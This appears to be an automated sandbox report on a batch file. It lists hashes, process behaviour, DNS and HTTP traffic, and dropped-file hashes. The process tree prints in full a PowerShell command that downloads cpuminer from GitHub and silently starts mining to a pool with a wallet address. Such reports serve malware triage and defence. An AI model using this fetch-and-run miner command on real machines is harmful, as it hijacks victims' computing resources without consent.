Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
1795s -
max time network
1806s -
platform
windows10-1703_x64 -
resource
win10-20231215-ja -
resource tags
arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows -
submitted
01/02/2024, 23:55 UTC
Static task
static1
Behavioral task
behavioral1
Sample
73u3Ito.bat
Resource
win10-20231215-ja
Behavioral task
behavioral2
Sample
73u3Ito.bat
Resource
win10v2004-20231215-ja
General
-
Target
73u3Ito.bat
-
Size
499B
-
MD5
fe74bff27516829a88cfbc6f6e99646f
-
SHA1
0c15d859211c79910b277d07e729bec7197a60cd
-
SHA256
b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
-
SHA512
a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 2 2172 powershell.exe 4 2172 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 4620 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 4620 cpuminer-sse2.exe 4620 cpuminer-sse2.exe 4620 cpuminer-sse2.exe 4620 cpuminer-sse2.exe 4620 cpuminer-sse2.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2172 powershell.exe 2172 powershell.exe 2172 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2172 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 4936 wrote to memory of 2172 4936 cmd.exe 74 PID 4936 wrote to memory of 2172 4936 cmd.exe 74 PID 2172 wrote to memory of 3892 2172 powershell.exe 75 PID 2172 wrote to memory of 3892 2172 powershell.exe 75 PID 3892 wrote to memory of 4620 3892 cmd.exe 77 PID 3892 wrote to memory of 4620 3892 cmd.exe 77
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4936 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 23⤵
- Suspicious use of WriteProcessMemory
PID:3892 -
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 24⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4620
-
-
-
Network
-
Remote address:8.8.8.8:53Requestgithub.comIN AResponsegithub.comIN A140.82.121.4
-
GEThttps://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zippowershell.exeRemote address:140.82.121.4:443RequestGET /JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; ja-JP) WindowsPowerShell/5.1.15063.0
Host: github.com
Connection: Keep-Alive
ResponseHTTP/1.1 302 Found
Date: Thu, 01 Feb 2024 23:57:33 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/51284118/46f2f116-d014-4e7d-b81d-eea84bd0fd1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240201%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240201T235733Z&X-Amz-Expires=300&X-Amz-Signature=4b9f9f74a60678178529496ff31908f90cb3754c85b09147b24d60ec6f8cb05c&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=51284118&response-content-disposition=attachment%3B%20filename%3Dcpuminer-opt-23.15-windows.zip&response-content-type=application%2Foctet-stream
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com cdn.optimizely.com logx.optimizely.com/v1/events api.githubcopilot.com objects-origin.githubusercontent.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: C28B:53831:1429D97E:1465039C:65BC2FEC
-
Remote address:8.8.8.8:53Requestobjects.githubusercontent.comIN AResponseobjects.githubusercontent.comIN A185.199.108.133objects.githubusercontent.comIN A185.199.109.133objects.githubusercontent.comIN A185.199.110.133objects.githubusercontent.comIN A185.199.111.133
-
GEThttps://objects.githubusercontent.com/github-production-release-asset-2e65be/51284118/46f2f116-d014-4e7d-b81d-eea84bd0fd1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240201%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240201T235733Z&X-Amz-Expires=300&X-Amz-Signature=4b9f9f74a60678178529496ff31908f90cb3754c85b09147b24d60ec6f8cb05c&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=51284118&response-content-disposition=attachment%3B%20filename%3Dcpuminer-opt-23.15-windows.zip&response-content-type=application%2Foctet-streampowershell.exeRemote address:185.199.108.133:443RequestGET /github-production-release-asset-2e65be/51284118/46f2f116-d014-4e7d-b81d-eea84bd0fd1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240201%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240201T235733Z&X-Amz-Expires=300&X-Amz-Signature=4b9f9f74a60678178529496ff31908f90cb3754c85b09147b24d60ec6f8cb05c&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=51284118&response-content-disposition=attachment%3B%20filename%3Dcpuminer-opt-23.15-windows.zip&response-content-type=application%2Foctet-stream HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; ja-JP) WindowsPowerShell/5.1.15063.0
Host: objects.githubusercontent.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Length: 18353564
Content-Type: application/octet-stream
Content-MD5: o9vnhIGbDner0qCCrwwyiA==
Last-Modified: Thu, 30 Nov 2023 19:41:07 GMT
ETag: "0x8DBF1DC4BEC4077"
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d190fa92-001e-0015-362f-4ff6e6000000
x-ms-version: 2020-10-02
x-ms-creation-time: Thu, 30 Nov 2023 19:41:07 GMT
x-ms-lease-status: unlocked
x-ms-lease-state: available
x-ms-blob-type: BlockBlob
Content-Disposition: attachment; filename=cpuminer-opt-23.15-windows.zip
x-ms-server-encrypted: true
Via: 1.1 varnish, 1.1 varnish
Accept-Ranges: bytes
Age: 0
Date: Thu, 01 Feb 2024 23:57:33 GMT
X-Served-By: cache-iad-kcgs7200050-IAD, cache-lon4220-LON
X-Cache: HIT, MISS
X-Cache-Hits: 760, 0
X-Timer: S1706831853.493195,VS0,VE392
-
Remote address:8.8.8.8:53Request4.121.82.140.in-addr.arpaIN PTRResponse4.121.82.140.in-addr.arpaIN PTRlb-140-82-121-4-fragithubcom
-
Remote address:8.8.8.8:53Request133.108.199.185.in-addr.arpaIN PTRResponse133.108.199.185.in-addr.arpaIN PTRcdn-185-199-108-133githubcom
-
Remote address:8.8.8.8:53Request79.121.231.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestyespower.na.mine.zpool.caIN AResponseyespower.na.mine.zpool.caIN A198.50.168.213
-
Remote address:8.8.8.8:53Request213.168.50.198.in-addr.arpaIN PTRResponse213.168.50.198.in-addr.arpaIN PTRminezpoolca
-
Remote address:8.8.8.8:53Request14.227.111.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request114.110.16.96.in-addr.arpaIN PTRResponse114.110.16.96.in-addr.arpaIN PTRa96-16-110-114deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request210.143.182.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request180.178.17.96.in-addr.arpaIN PTRResponse180.178.17.96.in-addr.arpaIN PTRa96-17-178-180deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request81.171.91.138.in-addr.arpaIN PTRResponse
-
140.82.121.4:443https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.ziptls, httppowershell.exe918 B 6.6kB 9 8
HTTP Request
GET https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zipHTTP Response
302 -
185.199.108.133:443https://objects.githubusercontent.com/github-production-release-asset-2e65be/51284118/46f2f116-d014-4e7d-b81d-eea84bd0fd1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240201%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240201T235733Z&X-Amz-Expires=300&X-Amz-Signature=4b9f9f74a60678178529496ff31908f90cb3754c85b09147b24d60ec6f8cb05c&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=51284118&response-content-disposition=attachment%3B%20filename%3Dcpuminer-opt-23.15-windows.zip&response-content-type=application%2Foctet-streamtls, httppowershell.exe377.5kB 18.9MB 7607 13594
HTTP Request
GET https://objects.githubusercontent.com/github-production-release-asset-2e65be/51284118/46f2f116-d014-4e7d-b81d-eea84bd0fd1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240201%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240201T235733Z&X-Amz-Expires=300&X-Amz-Signature=4b9f9f74a60678178529496ff31908f90cb3754c85b09147b24d60ec6f8cb05c&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=51284118&response-content-disposition=attachment%3B%20filename%3Dcpuminer-opt-23.15-windows.zip&response-content-type=application%2Foctet-streamHTTP Response
200 -
56.3kB 45.1kB 544 320
-
-
-
56 B 72 B 1 1
DNS Request
github.com
DNS Response
140.82.121.4
-
75 B 139 B 1 1
DNS Request
objects.githubusercontent.com
DNS Response
185.199.108.133185.199.109.133185.199.110.133185.199.111.133
-
71 B 115 B 1 1
DNS Request
4.121.82.140.in-addr.arpa
-
74 B 118 B 1 1
DNS Request
133.108.199.185.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
79.121.231.20.in-addr.arpa
-
71 B 87 B 1 1
DNS Request
yespower.na.mine.zpool.ca
DNS Response
198.50.168.213
-
73 B 100 B 1 1
DNS Request
213.168.50.198.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
14.227.111.52.in-addr.arpa
-
72 B 137 B 1 1
DNS Request
114.110.16.96.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
210.143.182.52.in-addr.arpa
-
72 B 137 B 1 1
DNS Request
180.178.17.96.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
81.171.91.138.in-addr.arpa
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
1.2MB
MD5660d14eb3c292b36dcd9bf058e2c0430
SHA1b552e1fe31d53cc1b030f2d8dd28da187166a2b4
SHA256a3930e2a51876082e01ae4b03a5c7195cc94c1e23f3d70778b10565433ef4396
SHA51275b03a830fc39e9fa0ec43ecab8bd49b0b1eefbc27ed612ae3f12a6cecc45e1e2ce3d1c581a0b0fe5c7b466865d8d40775884957ff0dc7970f6c1afda02421f8
-
Filesize
1005KB
MD557167ffdbf18357fa913a9f52f0ff4f8
SHA172f80689f5eafe73fe2054f52ab1592b0a8902bd
SHA25601ea7111be5775ddf2d4d6c62393168e25fe389beba4adb0c8d285ac71360cf8
SHA512daa2d4f6ea6cb98ff5152fda754862b4d927e883f046aec2ec46a67da9e06d91a5b7920d9caf18ac81971d3dfc925ecea1ef18ec9e7abae2b0a665356e97cdf6
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
668KB
MD585c2616d428b52f8c6ea1c95e7616f74
SHA109b10c96c22766b030aad0c09d375887cff73baa
SHA256fdde7602f3db8aed301e636e92076732c18b60c0efcaa95214215fb5821e4606
SHA512e39c0cabe7c06072256fb496cead20dde3e423a2d542cba7d1c985e32dfcd32af33b2a8f0283721f89712c7020242d478226dd564adb4207664e8745ac5c5f8a
-
Filesize
644KB
MD50dc0d5332fb653828ee94648fa2b8073
SHA18bbac56ea7390f908961615748bf131f037c02dc
SHA256b53852bc869bd2583854a2a133625891e39056988bd6c356e069b117b52bd88d
SHA51272a4182b9235f6dcb2536f77a80d46ebb207f4fc0b50bb5dbf92e21f0f25fc5de80302cb6d40033619e308039b9b1d9813ff38b5acbdac94f9b54be255a90c8d
-
Filesize
692KB
MD5d1b635c9bca7eb2527ac7f8e05edb394
SHA178556805f7754e216c9bee6fa8cf1b479b218427
SHA256ef71e3bb7e68c024ce9ba692a0e8259a62f7bb237fec0817ca5186133741aa27
SHA512fda726dd8172dd55d92105840416227f18b5342054cd95e1e09744901b57bd68391fc28ce75c2f9647be6dab5097fd891127aec36565b63c2490c805d72fdf33
-
Filesize
853KB
MD53d8671aa1701e511d45ffec439206bb9
SHA147453987837e114a08ac9fb042d56e0a6b8310c6
SHA256a335fe3223730a0c5c2c1d8ef283269c285db5336614f31779e527cef822ba0b
SHA512b96b1a5786ac522511576f2528276ea051bab1d7e6c2bbe6d1de5aaffd07c8a7b953746e1846ce4bb122a37a2258ef709c3b6f9961155d47605781b483ef14b2
-
Filesize
600KB
MD5e84745a3244c09e4e075828bf84ead2d
SHA1fe66f8d90f5ad97c8b4d2c50c8c4cfb3c86dc1e9
SHA256701ff0a36ef0d28523af4a1293686e04e6d563326b2ba61a08fb759d3da7dbfb
SHA512dfe4992afd6e9e332ea7bdbf507585981e07e17b6020e74c3482c2b28aca9142a086b7333803140c6f97008adfdf79de6dcf7aaa01bbfd006d83c8e296de1eb9
-
Filesize
617KB
MD58dddb2d69671e86d75d9775ac6459a20
SHA11a7b07fb8d0f5d68f9ff9a7445aa8cf07ccfd171
SHA2565f2981393cb14174b4018a3a46cee8eb7944244dea55da80c272fe21c600a189
SHA5129c740984fd11ceb791db28a39fd43d11a15cd551ee4495ecfe70fb49e8ce9dc2478d7d7144eb114c8c41bbcb5667b929fbeff5710f1a91c1ad89f0c2daae671a
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770